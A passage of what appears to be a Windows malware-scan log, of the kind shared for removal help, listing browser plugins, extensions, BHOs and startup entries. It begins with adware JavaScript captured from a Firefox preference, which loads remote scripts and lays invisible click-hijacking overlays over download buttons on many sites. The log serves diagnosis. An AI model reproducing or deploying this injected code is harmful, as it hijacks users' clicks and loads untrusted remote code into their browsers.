d=this.xlat.indexOf(a.charAt(b++)),\ne=this.xlat.indexOf(a.charAt(b++)),f=this.xlat.indexOf(a.charAt(b++)),h=this.xlat.indexOf(a.charAt(b++)),k=(e&15)<<4|f>>2,g=(f&3)<<6|h,c=c+String.fromCharCode(d<<2|e>>4);64!=f&&0<k&&(c+=String.fromCharCode(k));64!=h&&0<g&&(c+=String.fromCharCode(g))}return this._utf8_decode©},_utf8_decode:function(a){for(var c=\"\",b=0;b<a.length;){var d=a.charCodeAt( B);if(128>d)c+=String.fromCharCode(d),b++;else if(191<d&&224>d)var e=a.charCodeAt(b+1),c=c+String.fromCharCode((d&31)<<6|e&63),b=b+2;else var e=a.charCodeAt(b+\n1),f=a.charCodeAt(b+2),c=c+String.fromCharCode((d&15)<<12|(e&63)<<6|f&63),b=b+3}return c}}};\nadzy653rk.location = adzy653rk.imp.referrer+window.self.location.href;if(adzy653rk.location.indexOf(adzy653rk.imp.jpshort+\"=\")==-1 &&adzy653rk.location.indexOf(\"adk2.co\")==-1 &&\"ads.mangomediaads.com optimizedby.brealtime.com www.adshost2.com s-tag.z5x.net ad.z5x.net exchange.admailtiser.com ad.yieldmanager.com kncxsw.com creative.rev2pub.com ad.adserverplus.com servedby.adxplosions.com cdn.trkclk.net srv.aileronx.com smgadserver.com ads.exoclick.com ads.ventivmedia.com servedby.adsplats.com ad.reachjunction.com ads.deliads.com srv1.statisticsreporting.com ads.ad-maven.com ad.adnetwork.net ads.incmd03.com ads.mediawhite.com Servedby.bigfineads.com a.ad-sys.com hxewaz.com ads.yahoo.com tala.intlsources.com an.z5x.net c5.zedo.com ib.adnxs.com ad.jumbaexchange.com tr.adsplats.com ads.sonobi.com fw.adsafeprotected.com ad.improvemedianetwork.com media.glispa.com\".indexOf(window.self.location.hostname)==-1 &&adzy653rk.location.indexOf(\"zoneid=287609\")==-1 &&adzy653rk.location.indexOf(\"zoneid=511181\")==-1 &&adzy653rk.location.indexOf(\"2136&zid=\")==-1 &&adzy653rk.location.indexOf(\"1018-1005\")==-1 &&adzy653rk.location.indexOf(\"1019-1001\")==-1 &&adzy653rk.location.indexOf(\"PT1312\")==-1)adzy653rk.init()})()};if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1750/l.js?aoi=1311798366&pid=1750&zoneid=511181&ext=SaverPro&systemid=8347115683178558813&ext=SaverPro\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;(function(){-1<window.self.location.hostname.indexOf(\"kass.t\")&&setTimeout(function(){document.getElementById(\"_ad4d917f2e764fab63b916b5e0655d2e\")&&document.getElementById(\"_ad4d917f2e764fab63b916b5e0655d2e\").firstElementChild&&(document.getElementById(\"_ad4d917f2e764fab63b916b5e0655d2e\").firstElementChild.onclick=function(){return!1});if(document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\")){var f=document.getElementById(\"_091c88d5b8c081bf15d212c4ae994c85\"),g=document.createElement(\"div\");\ng.setAttribute(\"style\",\"width:100%;height:300%;position:absolute;left:0;top:0\");g.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">';f.style.position=\"relative\";f.appendChild(g)}document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\")&&(f=document.getElementById(\"_2bffc94164dd9984ae4826e8bc988721\"),g=document.createElement(\"div\"),g.setAttribute(\"style\",\"width:100%;height:121%;position:absolute;left:0;top:0\"),\ng.innerHTML='<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"width:100%;height:100%\">',f.style.position=\"relative\",f.appendChild(g))},250);if(-1<window.self.location.hostname.indexOf(\"eo-online.me\")&&window.self==window.top){var f=function(){try{if(jQuery(\".down, .dloadf, .dloadt\").attr(\"href\",\"#\"),$(\"#adsfrm\").length){var f=$(\"#adsfrm\").offset();$('<img src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\" style=\"position:absolute;z-index:9999;top:'+\nf.top+\"px;left:\"+f.left+\"px;width:\"+$(\"#adsfrm\").width()+\"px;height:\"+$(\"#adsfrm\").height()+'px;\">').appendTo(\"body\")}}catch(g){}},g=document.createElement(\"script\");g.type=\"text/javascript\";g[-1<navigator.userAgent.toLowerCase().indexOf(\"msie\")?\"text\":\"innerHTML\"]=\"(\"+f.toString()+\")()\";document.getElementsByTagName(\"head\")[0].appendChild(g)}-1<window.self.location.hostname.indexOf(\"ehd.c\")&&document.getElementById(\"r1113566095\")&&(f=document.createElement(\"img\"),f.setAttribute(\"style\",\"width:100%;height:100%;position:absolute;z-index:99999;left:0;top:0\"),\nf.src=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEHAAAALAAAAAABAAEAAAICRAEAOw==\",g=document.getElementById(\"r1113566095\").parentNode,g.style.position=\"relative\",g.appendChild(f))})();-1<window.self.location.hostname.indexOf(\"hesefiles.c\")&&(window.self.location.href=\"about:blank\");\nif(-1<window.self.location.hostname.indexOf(\"usfiles.ne\")){var a=function(){$(\"form[name=F1]\").submit(function(){if(-1<$(this).attr(\"action\").indexOf(\"bdl1=\"))return $(\"input[name=quick]\").attr(\"checked\",!1),window.setTimeout(function(){$(\"#btn_download\").attr(\"disabled\",!1).val(\"Download Now!!\");$(\"form[name=F1]\").unbind(\"submit\")},700),!1})};if(-1==navigator.userAgent.toLowerCase().indexOf(\"chrome\"))a();else{var s=document.createElement(\"script\");s.type=\"text/javascript\";s.innerHTML=\"(\"+a.toString()+\n\")()\";document.body.appendChild(s)}}if(-1<window.self.location.hostname.indexOf(\"ebeast.co\")){var d=document.getElementsByTagName(\"div\"),i;for(i in d)d[i]&&d[i].style&&\"fixed\"==d[i].style.position&&\"solid\"==d[i].style.borderBottomStyle&&(d[i].style.display=\"none\")}if(-1<window.self.location.hostname.indexOf(\"oolrom.com\")){var date=new Date;date.setTime(date.getTime()+2592E6);var expires=\"; expires=\"+date.toGMTString();document.cookie=\"installer=14604\"+expires+\"; path=/;domain=.coolrom.com\"}\n-1<document.location.host.indexOf(\"bookbrowsee.ne\")&&new function(){for(var f=[\"adv.php?\",\"/adv.php?\"],g=0;g<document.links.length;g++)for(var h=document.links[g],l=h.pathname+h.search,m=0;m<f.length;m++)f[m]==l.substr(0,f[m].length)&&\"nofollow\"==h.rel&&\"_blank\"==h.target&&(h.setAttribute(\"onclick\",\"return false\"),h.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1))};\nif(-1<document.location.host.indexOf(\"irrorcreator.co\"))for(var c=[\"verticdn.com\"],d=0;d<document.links.length;d++)for(var a=document.links[d],e=a.host,b=0;b<c.length;b++)c[b]==e&&(a.setAttribute(\"onclick\",\"return false\"),a.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1));\n-1<document.location.host.indexOf(\"loud-vibe.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1),a.addEventListener(\"mousedown\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1));\n-1<document.location.host.indexOf(\"p3seal.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1),a.addEventListener(\"mousedown\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1));\n-1<document.location.host.indexOf(\"p3vampire.co\")&&(a=document.getElementById(\"continue\"),a.setAttribute(\"onclick\",\"return false\"),a.setAttribute(\"href\",\"\"),a.addEventListener(\"click\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1),a.addEventListener(\"mousedown\",function(f){f.returnValue=!1;f.preventDefault&&f.preventDefault()},!1));\n-1<document.location.href.indexOf(\"necraftdl.com/download.ph\")&&(a=document.getElementById(\"downloadpage\"),b=a.getElementsByTagName(\"a\")[0],d=document.createElement(\"div\"),d.style.position=\"absolute\",d.style.width=\"100%\",d.style.height=\"34px\",d.style.left=\"0\",d.style.cursor=\"pointer\",d.style.zIndex=9999,b.parentNode.insertBefore(d,b.previousSibling));\nif(-1<document.location.href.indexOf(\"necraftdl.com\"))for(i=0;i<document.links.length;i++){var link=document.links[i];if(\".exe\"==link.href.substr(-4)){var p=link.parentNode;p.style.position=\"relative\";d=document.createElement(\"div\");d.style.position=\"absolute\";d.style.top=0;d.style.left=0;d.style.width=\"100%\";d.style.height=\"100%\";d.style.cursor=\"pointer\";d.style.zIndex=9999;p.appendChild(d)}}\nif(-1<document.location.host.indexOf(\"leunlckr.co\")){var b=document.getElementsByTagName(\"button\")[0],b2=document.createElement(\"button\");b2.className=b.className;b2.innerHTML=b.innerHTML;b.parentNode.insertBefore(b2, B);b.parentNode.removeChild( B)}-1<document.referrer.indexOf(\"go.theadsnet.com\")&&document.write(\"\");\n(function(){var f=0;try{if(-1<window.location.href.indexOf(\"ack-free.co\"))var g=setInterval(function(){try{var h=document.getElementById(\"ucd-countdown-1\"),m=[];m.push(1*h.children[2].children[1].children[1].innerText);m.push(1*h.children[2].children[2].children[1].innerText);m.push(1*h.children[3].children[1].children[1].innerText);m.push(1*h.children[3].children[2].children[1].innerText);for(var n=h=0;n<m.length;n++)h+=m[n];if(!(0<h)){clearInterval(g);var k=document.createElement(\"div\");k.style.position=\n\"absolute\";k.style.top=0;k.style.left=0;k.style.width=\"100%\";k.style.height=\"100%\";k.style.zIndex=\"9999\";k.style.cursor=\"pointer\";var q=document.getElementById(\"ucd-countdown-1-content\").children[1];q.style.position=\"relative\";q.appendChild(k)}}catch(u){try{var r=0;jQuery.each(jQuery(\".ucd-figure.ucd-countdown-digit-bottom\"),function(){r+=1*jQuery(this).text()});if(0===r){clearInterval(g);var t=jQuery(\"#ucd-countdown-1-content iframe\"),v=t.parent();t.remove();v.html(\"<img title='Get Download' alt='latbut' src='http://i.imgur.com/At0oA5A.png' height='61' width='373'>\")}}catch(w){\"undefined\"!==\ntypeof f&&30<++f&&clearInterval(g)}}},750)}catch(h){}})();\nvar __intervalcountasd=0,__intervalasd=setInterval(function(){__intervalcountasd++;if(-1<window.location.host.indexOf(\"ownloads.ziddu.co\")){for(var f=0;f<document.links.length;f++)try{var g=document.links[f].href.toLowerCase();if(-1==g.indexOf(\"ww.ziddu.co\")&&-1==g.indexOf(\"#\")&&-1==g.indexOf(\"tunes.apple.co\")&&-1==g.indexOf(\"lay.google.co\")&&-1==g.indexOf(\"/gallery/\")){try{for(var h=document.links[f],l=0;15>=l;l++)h=h.parentNode;if(-1<h.className.indexOf(\"footerbg\"))continue}catch(m){}var n=document.links[f].parentNode;\nif(!(-1<n.className.indexOf(\"addthis_toolbox\"))){n.style.position=\"relative\";var k=document.createElement(\"div\");k.style.position=\"absolute\";k.style.left=0;k.style.top=0;k.style.width=\"100%\";k.style.height=\"100%\";k.style.zIndex=\"9999\";k.style.cursor=\"pointer\";n.appendChild(k)}}}catch(q){}g=document.getElementsByTagName(\"iframe\");for(f=0;f<g.length;f++)try{-1==g[f].src.indexOf(\"acebook.co\")&&-1==g[f].src.indexOf(\"cp.crwdcntrl.ne\")&&(n=g[f].parentNode,n.style.position=\"relative\",k=document.createElement(\"div\"),\nk.style.position=\"absolute\",k.style.left=0,k.style.top=0,k.style.width=\"100%\",k.style.height=\"100%\",k.style.zIndex=\"9999\",k.style.cursor=\"pointer\",k.id=f,n.appendChild(k))}catch(u){}}20<__intervalcountasd&&clearInterval(__intervalasd)},500);\nif(0<location.host.toLowerCase().indexOf(\"pensubtitles.or\")){d=document.createElement(\"div\");d.style.position=\"absolute\";d.style.width=\"728px\";d.style.height=\"90px\";d.style.cursor=\"pointer\";d.style.top=\"0\";d.style.zIndex=\"2000\";var frame=document.getElementsByTagName(\"iframe\")[0].parentNode;frame.insertBefore(d,document.getElementsByTagName(\"iframe\")[0]);frame.style.position=\"relative\";var as=document.links;for(i=0;i<as.length;i++){var text=\"undefined\"===typeof as[i].innerText?as[i].textContent:as[i].innerText;\n\"Download\"==text&&(d=document.createElement(\"div\"),d.style.position=\"absolute\",d.style.width=\"214px\",d.style.height=\"40px\",d.style.cursor=\"pointer\",d.style.top=\"0\",d.style.zIndex=\"2000\",p=as[i].parentNode,p.style.position=\"relative\",p.insertBefore(d,as[i]))}document.getElementById(\"scrubbuad\").style.zIndex=\"15\";var d1=document.createElement(\"div\");d1.style.zIndex=\"15000\";d1.style.right=\"9px\";d1.style.bottom=\"0\";d1.style.position=\"fixed\";d1.style.padding=\"0\";d1.style.margin=\"0 0 30px 0\";d1.style.width=\n\"220px\";d1.style.height=\"72px\";d1.style.overflow=\"visible\";d1.style.cursor=\"pointer\";document.getElementsByTagName(\"body\")[0].firstChild.appendChild(d1)}\nif(-1<location.host.toLowerCase().indexOf(\"romptfile.co\")){for(var p={},frames=document.getElementById(\"confirmbox\").getElementsByTagName(\"iframe\"),index=0;index<frames.length;index++)\"300\"==frames[index].getAttribute(\"width\")&&\"250\"==frames[index].getAttribute(\"height\")&&(p=frames[index].parentNode);p.style.position=\"relative\";d=document.createElement(\"div\");d.style.position=\"absolute\";d.style.width=\"100%\";d.style.height=\"255px\";d.style.cursor=\"pointer\";d.style.top=\"0\";d.style.zIndex=\"2000\";p.appendChild(d)}\nnew function(){if(-1<window.location.host.toLowerCase().indexOf(\"pensoftwareupdater.co\"))if(\"undefined\"!==typeof $)window.__qqcount=0,window.__qqint=setInterval(function(){var f=$(\".download\").parent();f.css(\"position\",\"relative\");var g=document.createElement(\"div\");g.style.position=\"absolute\";g.style.zIndex=\"2000\";g.style.height=\"100%\";g.style.width=\"122px\";g.style.right=\"0\";g.style.top=\"0\";g.style.cursor=\"pointer\";f.append(g);f=$(\"#addBoxX\").parent();f.css(\"position\",\"relative\");g=document.createElement(\"div\");\ng.style.position=\"absolute\";g.style.zIndex=\"2000\";g.style.height=\"45px\";g.style.width=\"101px\";g.style.right=\"22px\";g.style.bottom=\"16px\";g.style.cursor=\"pointer\";f.append(g);window.__qqcount++;10<window.__qqcount&&clearInterval(window.__qqint)},250);else for(var f=document.links,g={},h={},l=0;l<f.length;l++)g=f[l].getAttribute(\"href\"),null!=g&&-1<g.toLowerCase().indexOf(\"pensoftwareupdater.com/idownloader.ph\")&&(g=f[l].getAttribute(\"id\"),null!=g&&\"addBoxX\"==g?(h=f[l].parentNode,h.style.position=\"relative\",\ng=document.createElement(\"div\"),g.style.position=\"absolute\",g.style.zIndex=\"2000\",g.style.height=\"45px\",g.style.width=\"101px\",g.style.right=\"22px\",g.style.bottom=\"16px\"):(h=f[l].parentNode,h.style.position=\"relative\",g=document.createElement(\"div\"),g.style.position=\"absolute\",g.style.zIndex=\"2000\",g.style.height=\"100%\",g.style.width=\"122px\",g.style.right=\"0\",g.style.top=\"0\"),g.style.cursor=\"pointer\",h.appendChild(g))};\nnew function(){-1<location.host.toLowerCase().indexOf(\"ickass.t\")&&(window.___intrvCount=0,window.___intervFounc=function(){var f=document.links,g=document.getElementById(\"tab-main\");if(null!=g){clearInterval(window.___interv);g.style.position=\"relative\";var h=document.createElement(\"div\");h.style.width=\"600px\";h.style.height=\"60px\";h.style.cursor=\"pointer\";h.style.zIndex=\"2000\";h.style.position=\"absolute\";h.style.top=\"0\";g.appendChild(h)}for(g=0;g<f.length;g++){var l=f[g].parentNode;\"center\"==l.getAttribute(\"align\")&&\n(l.style.position=\"relative\",h=document.createElement(\"div\"),h.style.width=\"100%\",h.style.height=\"100%\",h.style.cursor=\"pointer\",h.style.zIndex=\"2000\",h.style.position=\"absolute\",h.style.top=\"0\",l.appendChild(h),clearInterval(window.___interv))}9<window.___intrvCount++&&clearInterval(window.___interv)},window.___interv=setInterval(window.___intervFounc,500))};\nnew function(){-1<location.host.toLowerCase().indexOf(\"ulkload.co\")&&(window.___interCount=0,window.___interval=setInterval(function(){for(var f=document.getElementsByTagName(\"center\"),g=0;g<f.length;g++)if(0!=g&&!(-1<f[g].innerHTML.indexOf(\"adcopy-outer\")||-1<f[g].innerHTML.indexOf(\"btn_download\")||-1<f[g].innerHTML.indexOf(\"solvemedia puzzle widget\"))){var h=document.createElement(\"div\");h.style.width=\"100%\";h.style.height=\"100%\";h.style.cursor=\"pointer\";h.style.zIndex=\"1900\";h.style.position=\"absolute\";\ng==f.length-1?(h.style.bottom=\"0\",h.style.height=\"110px\"):h.style.top=\"0\";f[g].style.position=\"relative\";f[g].appendChild(h)}f=document.getElementById(\"cap\");null!=f&&(f.parentNode.style.position=\"relative\",f.parentNode.style.zIndex=\"2000\");20<window.___interCount++&&clearInterval(window.___interval)},500))};\nnew function(){if(-1<location.host.toLowerCase().indexOf(\"eehd.co\")){var f=document.createElement(\"div\");f.style.top=\"0\";f.style.width=\"100%\";f.style.height=\"100%\";f.style.cursor=\"pointer\";f.style.zIndex=\"2000\";f.style.position=\"absolute\";var g=document.getElementsByTagName(\"iframe\")[0].parentNode;g.style.position=\"relative\";g.appendChild(f);f=document.createElement(\"div\");f.style.top=\"0\";f.style.width=\"100%\";f.style.height=\"100%\";f.style.cursor=\"pointer\";f.style.zIndex=\"2000\";f.style.position=\"absolute\";\ng=document.getElementById(\"preview\");g.style.position=\"relative\";g.appendChild(f)}};new function(){-1<window.location.host.toLowerCase().indexOf(\"p3olimp.ne\")&&(window.__intCount=0,window.__int=setInterval(function(){var f=document.getElementById(\"download-manager-checkbox\");if(null!==f)try{f.setAttribute(\"checked\",!1),document.getElementById(\"checkbox\").checked=!1}catch(g){}window.__intCount++;10<window.__intCount&&clearInterval(window.__int)},250))};\nif(-1<document.location.host.indexOf(\"p3olimp.ne\")&&document.getElementsByClassName&&null!==document.getElementById(\"download-manager-checkbox\"))for(c=document.getElementById(\"download-manager-checkbox\"),c.onchange=function(){for(var f=document.getElementsByClassName(\"nasjfkla\"),g=0;g<f.length;g++)f[g].style.display=c.checked?\"block\":\"none\"},i=0;i<document.links.length;i++){var link=document.links[i],onclick=link.getAttribute(\"onclick\");if(onclick&&-1<onclick.indexOf(\"prepare_download_file\")){var div=\nlink.parentNode;div.style.position=\"relative\";b=document.createElement(\"div\");b.className=\"nasjfkla\";b.style.position=\"absolute\";b.style.top=\"-2px\";b.style.left=\"92px\";b.style.width=\"71px\";b.style.height=\"16px\";b.style.zIndex=\"99999\";b.style.cursor=\"pointer\";div.appendChild( B)}}\n-1<location.host.indexOf(\"p3olimp.ne\")&&setTimeout(function(){for(var f=document.getElementById(\"leftside\"),g=0;g<f.children.length;g++)if(/\\bspnBook\\b/.test(f.children[g].className))for(var h=f.children[g].getElementsByTagName(\"a\"),l=0;l<h.length;l++)h[l].setAttribute(\"href\",\"#\"),h[l].setAttribute(\"target\",\"\")},1E3);\nnew function(){if(-1<window.location.host.toLowerCase().indexOf(\"ullypcgames.ne\"))for(var f=document.getElementsByTagName(\"center\"),g=0;g<f.length;g++){var h=f[g].firstChild;\"undefined\"!==typeof h.tagName&&\"a\"==h.tagName.toLowerCase()&&(f[g].style.position=\"relative\",h=document.createElement(\"div\"),h.style.position=\"absolute\",h.style.top=\"0\",h.style.left=\"0\",h.style.width=\"100%\",h.style.height=\"100%\",h.style.zIndex=\"2000\",h.style.cursor=\"pointer\",f[g].appendChild(h))}};;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache-a.akamaihd.net/loaders/1748/l.js?aoi=1311798366&pid=1748&zoneid=511181&ext=SaverPro&systemid=8347115683178558813&ext=SaverPro\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;try {new function() {if (document.getElementById(\"id_a92246ee8f90930c\") == null&& window.self == window.top) {var script = document.createElement(\"script\");script.type = \"text/javascript\";script.src = \"https://interyield.jmp9.com/InterYield/bindevent.do?e=click&affiliate=wpop&subid=83_777&ecpm=0 &debug=false&snoozeMinutes=3&adCountIntervalHours=24&maxAdCountsPerInterval=3&attributionTitle=SaverPro\";script.setAttribute(\"id\", \"id_a92246ee8f90930c\");document.getElementsByTagName(\"head\")[0].appendChild(script);}}}catch (e) {}})();(function(){void(0)})()");
FF - prefs.js..extensions.enabledAddons: wrc%40avast.com:8.0.1489
FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:31.0
FF - user.js - File not found
 
FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\WINDOWS\system32\Macromed\Flash\NPSWF32_14_0_0_145.dll ()
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=:  File not found
FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF - HKLM\Software\MozillaPlugins\@canon.com/MycameraPlugin: C:\Program Files\Canon\ZoomBrowser EX\Program\NPCIG.dll (CANON INC.)
FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.25.2: C:\WINDOWS\system32\npDeployJava1.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.25.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@microsoft.com/WPF,version=3.5: c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF - HKLM\Software\MozillaPlugins\@movenetworks.com/Quantum Media Player:  File not found
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF - HKCU\Software\MozillaPlugins\@movenetworks.com/Quantum Media Player:  File not found
FF - HKCU\Software\MozillaPlugins\@nsroblox.roblox.com/launcher: C:\Documents and Settings\Jay\Local Settings\Application Data\RobloxVersions\version-759151294bb84441\\NPRobloxProxy.dll ()
 
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\extensions\\smartwebprinting@hp.com: C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 [2011/09/19 21:23:54 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\extensions\\wrc@avast.com: C:\Program Files\AVAST Software\Avast\WebRep\FF [2013/06/11 10:12:39 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 31.0\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2014/08/10 15:54:56 | 000,000,000 | ---D | M]
FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 31.0\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins [2014/08/17 08:30:49 | 000,000,000 | ---D | M]
FF - HKEY_CURRENT_USER\software\mozilla\Firefox\Extensions\\smartwebprinting@hp.com: C:\Program Files\HP\Digital Imaging\Smart Web Printing\MozillaAddOn3 [2011/09/19 21:23:54 | 000,000,000 | ---D | M]
 
[2008/12/09 18:30:22 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Jay\Application Data\Mozilla\Extensions
[2014/08/23 18:32:16 | 000,000,000 | ---D | M] (No name found) -- C:\Documents and Settings\Jay\Application Data\Mozilla\Firefox\Profiles\vthtiiie.default\extensions
[2009/04/04 11:00:10 | 000,000,000 | ---D | M] (Move Media Player) -- C:\Documents and Settings\Jay\Application Data\Mozilla\Firefox\Profiles\vthtiiie.default\extensions\moveplayer@movenetworks.com
[2012/02/14 17:59:56 | 000,020,591 | ---- | M] () (No name found) -- C:\Documents and Settings\Jay\Application Data\Mozilla\Firefox\Profiles\vthtiiie.default\extensions\{20a82645-c095-46ed-80e3-08825760534b}.xpi
[2014/08/10 14:28:49 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files\Mozilla Firefox\extensions
[2014/08/10 14:28:50 | 000,000,000 | ---D | M] (Java Console) -- C:\Program Files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0035-ABCDEFFEDCBA}
[2014/08/10 14:28:45 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files\Mozilla Firefox\browser\extensions
[2014/08/10 14:30:20 | 000,000,000 | ---D | M] (Default) -- C:\Program Files\Mozilla Firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
[2013/06/11 10:12:39 | 000,000,000 | ---D | M] (avast! Online Security) -- C:\PROGRAM FILES\AVAST SOFTWARE\AVAST\WEBREP\FF
 
========== Chrome  ==========
 
CHR - default_search_provider:  (Enabled)
CHR - default_search_provider: search_url =
CHR - default_search_provider: suggest_url =
CHR - homepage: http://www.google.com/
CHR - plugin: Error reading preferences file
CHR - Extension: Google Drive = C:\Documents and Settings\Jay\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_1\
CHR - Extension: Google Voice Search Hotword (Beta) = C:\Documents and Settings\Jay\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn\0.1.1.5019_0\
CHR - Extension: YouTube = C:\Documents and Settings\Jay\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_1\
CHR - Extension: Google Search = C:\Documents and Settings\Jay\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_1\
CHR - Extension: Google Wallet = C:\Documents and Settings\Jay\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.6.1_0\
CHR - Extension: Gmail = C:\Documents and Settings\Jay\Local Settings\Application Data\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_2\
 
O1 HOSTS File: ([2014/08/23 18:32:29 | 000,000,027 | ---- | M]) - C:\WINDOWS\system32\drivers\etc\hosts
O1 - Hosts: 127.0.0.1       localhost
O2 - BHO: (Java™ Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
O2 - BHO: (avast! WebRep) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
O2 - BHO: (Bing Bar Helper) - {d2ce3e00-f94a-4740-988e-03dc2f38c34f} - C:\Program Files\Microsoft\BingBar\7.1.361.0\BingExt.dll (Microsoft Corporation.)
O2 - BHO: (Java™ Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
O3 - HKLM\..\Toolbar: (Acer eDataSecurity Management) - {5CBE3B7C-1E47-477e-A7DD-396DB0476E29} - C:\WINDOWS\system32\eDStoolbar.dll (HiTRUST)
O3 - HKLM\..\Toolbar: (Bing Bar) - {8dcb7100-df86-4384-8842-8fa844297b3f} - C:\Program Files\Microsoft\BingBar\7.1.361.0\BingExt.dll (Microsoft Corporation.)
O3 - HKLM\..\Toolbar: (avast! WebRep) - {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} - C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
O3 - HKCU\..\Toolbar\ShellBrowser: (Acer eDataSecurity Management) - {5CBE3B7C-1E47-477E-A7DD-396DB0476E29} - C:\WINDOWS\system32\eDStoolbar.dll (HiTRUST)
O4 - HKLM..\Run: [AmazonGSDownloaderTray] C:\Program Files\Amazon\Amazon Games & Software Downloader\AmazonGSDownloaderTray.exe (Amazon.com)
O4 - HKLM..\Run: [APSDaemon] C:\Program Files\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc.)
O4 - HKLM..\Run: [avast] C:\Program Files\AVAST Software\Avast\avastUI.exe (AVAST Software)
O4 - HKLM..\Run: [eDataSecurity Loader] C:\Acer\Empowering Technology\eDataSecurity\eDSloader.exe (HiTRUST)
O4 - HKLM..\Run: [eRecoveryService] C:\Acer\Empowering Technology\eRecovery\eRAgent.exe (Acer Inc.)
O4 - HKLM..\Run: [IMEKRMIG6.1] C:\WINDOWS\ime\imkr6_1\imekrmig.exe (Microsoft Corporation)
O4 - HKLM..\Run: [IMJPMIG8.1] C:\WINDOWS\IME\imjp8_1\IMJPMIG.EXE (Microsoft Corporation)
O4 - HKLM..\Run: [LaunchApp] C:\WINDOWS\Alaunch.exe (Acer Inc.)
O4 - HKLM..\Run: [Malwarebytes Anti-Malware (reboot)] "C:\Program Files\Malwarebytes' Anti-Malware\iexplore.exe" /runcleanupscript File not found
O4 - HKLM..\Run: [MSPY2002] C:\WINDOWS\System32\IME\PINTLGNT\ImScInst.exe ()
O4 - HKLM..\Run: [ntiMUI] c:\Program Files\NewTech Infosystems\NTI CD & DVD-Maker 7\ntiMUI.exe ()
